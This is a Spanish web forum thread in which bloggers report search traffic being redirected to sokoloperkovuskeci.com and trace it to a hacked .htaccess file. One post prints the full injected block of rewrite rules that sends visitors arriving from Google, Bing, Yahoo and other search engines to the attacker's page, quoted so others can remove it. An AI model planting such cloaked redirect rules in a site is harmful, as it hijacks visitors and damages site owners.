Problemas con enlaces redirigidos a sokoloperkovuskeci.com en mi blog

• Autor Autor d1360
  • Fecha de inicio Fecha de inicio
d1360

d1360

Préstamo impago
1
Dseda
Verificado
Verificación en dos pasos activada
Suscripción a IA
Mi blog (Enlace eliminado) ha tenido muy pocas visitas el día de hoy, por lo que busque si el SEO estaba bien, así que busque temas en los que estoy en la posición número 1 como "10 cosas curiosas sobre mario bros", y cuando le doy clic al enlace, intenta entrar a "http://sokoloperkovuskeci.com/" y no carga nada.

Alguien sabe como puedo solucionar este problema?

Eso me huele a Hack ! Una redireccion implementada en tu sitio, deberias revisar los archivos de tu host !!

parece que tu web fue hackeada!!! cuando la visita es de google envia a la otra web, pero si accedes directamente a tu web no... tendras que verificar tu blog...

Cuando es de alguna referencia no deja pero directo si, trate de acceder desde el elace que dejastes aca y no dejo pero la escrii y si, puede ser algun hack de un plugin pero te estanperjudicando.

Pues buscare.. aun que no se precisamente en donde.. pero tengo que hacer algo.. esta afectando mucho a mis visitas, hoy solo llevo 187.... :S

El theme tiene más de 1 semana.. y todo estaba perfecto, al buscar en google "sokoloperkovuskeci.com", aparece que otras personas han tenido es problema, veré si puedo encontrar una solución.

Ya quedo, todo estaba en el archivo .htaccess, me encontraba con los siguiente:

RewriteRule .* Enlace eliminado [R,L]

Creo que ahora esta todo listo, si pueden probar háganlo.

Gracias.

A mmi me esta pasando exactamente lo mismo

Gracias amigo si no hubierasido por este tema me estubiera arrancando los cabellos

Como habran hackeado mi web

Que hosting usas?

Alguien me puede decir si este exactamente es el problema y si alguien tiene alguna idea de como pudo llegar esto hasta el .htaccess?

Creo que mas personas hemos tenido este problema y esta es la primera pagina que sale en los resultados al consultar este problema, deberiamos tratar de resolver aqui entre todos.

HTML:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=405 [R,L]
</IfModule>

Deben borrar toda lo que coloque arriba para acabar con el problema.
Tambien estoy con Godaddy

Última edición:
cosa extraña.. googleando he visto 2 o 3 afectados más de goddady también..

tendrá que ver el hosting?

El problema no es de wordpress, yo lo tuve en joomla.

El problema no es wordpress ni joomla, a mi tambien me paso lo mismo, mi sitio es un buscador de videos y fue programado por mi, supongo que es un problema de vulnerabilidad en host Godaddy.

Atrás